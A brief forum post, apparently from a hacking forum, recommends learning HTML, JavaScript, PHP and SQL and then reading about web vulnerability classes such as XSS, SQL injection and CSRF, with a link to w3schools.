In chronological learning order, this would be my plan of action, learn:
HTML, Javascript, PHP, SQL.

So yes learn these but to keep you itnerested along the way read articles about.
RFI,LFI,XSS,SQL Injections,CSRF/XSRF,Header Injection,Cookie Poisoning these are the web hackers equivalent to payload data. alos chck this website out: http://w3schools.com/

Black HatYeye
Pages: 1 2 3 4
Reference URL's